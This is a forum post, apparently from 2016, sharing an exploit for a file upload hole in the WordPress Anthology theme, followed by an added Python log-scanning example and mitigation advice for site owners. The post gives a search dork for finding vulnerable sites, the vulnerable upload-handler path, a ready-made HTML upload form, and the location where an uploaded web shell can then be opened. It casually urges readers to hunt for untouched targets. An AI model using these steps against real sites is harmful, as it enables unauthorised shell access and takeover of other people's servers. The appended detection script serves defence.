Exploit WordPress Anthology Themes Remote File Upload Vulnerability

by Nue Bhandell - 03-10-2016 at 06:25 PM
Hello, good evening gang, is anyone still awake in the middle of the night like this? lol  :D
Just sharing an old exploit for fun, maybe it still works, haha.
Those who are already masters, step aside for now, babe  :heart:

Moving on.

inurl:/wp-content/themes/Anthology/
(Develop the rest yourselves, use that dirty imagination of yours, so you can find ones that are vulnerable and untouched.)

exploit: /wp-content/themes/Anthology/functions/upload-handler.php

Signs that it's vulnerable o.O ?
An error or a blank page appears *roughly like that, sorry if I'm wrong, haha

[Image: a3vN8Ln.png]

Copy the CSRF upload script:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />

</form>


Once you have opened the CSRF upload form, go ahead and upload your file/shell.
If the upload succeeds, the name of your file/shell will appear, gang :3

[Image: TqGjVFQ.png]

Shell access: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

[Image: necnt7I.png]

Done x_O

Visit my blog too, gang: TKJ Cyber Art


Source


Hope this is useful, gang, sorry if the post is lame  :)
Time for Nue and the Katakan Putus team to head off, gang, because tomorrow there are still school exams, lol.
bye ..
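For site owners, an added example that is not part of the original post: a scan of web-server access logs for the two requests the post describes, a POST to the theme's upload-handler.php and a later request for a script under wp-content/uploads/[year]/[month]/. It assumes Apache/nginx combined log format; the function names, the extension list and the sample log lines are constructed for illustration.

```python
import re

# Path of the theme's upload handler, as given in the post.
HANDLER = "/wp-content/themes/Anthology/functions/upload-handler.php"
# Server-side script requested from the dated uploads tree (extension list is an assumption).
UPLOADED_SCRIPT = re.compile(
    r"^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.(?:php\d?|phtml|phar)(?:\?|$)", re.I)
# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def scan(lines):
    """Return (kind, ip, path, status) tuples for requests worth reviewing."""
    posted = set()   # client IPs that POSTed to the upload handler
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if method == "POST" and path.split("?", 1)[0] == HANDLER:
            posted.add(ip)
            findings.append(("handler_post", ip, path, status))
        elif UPLOADED_SCRIPT.match(path):
            # Strongest signal: same client hit the handler earlier in the log.
            kind = "script_after_upload" if ip in posted else "script_in_uploads"
            findings.append((kind, ip, path, status))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2016:18:31:02 +0000] "POST /wp-content/themes/Anthology/functions/upload-handler.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [10/Mar/2016:18:31:40 +0000] "GET /wp-content/uploads/2016/03/example.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [10/Mar/2016:18:32:10 +0000] "GET /wp-content/uploads/2016/03/photo.jpg HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.9 - - [10/Mar/2016:18:33:00 +0000] "GET /wp-content/uploads/2016/03/old.PHP?x=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response to a script under the uploads tree is the entry to investigate first. Denying script execution in wp-content/uploads at the web-server level and removing the unused theme close the path the post relies on.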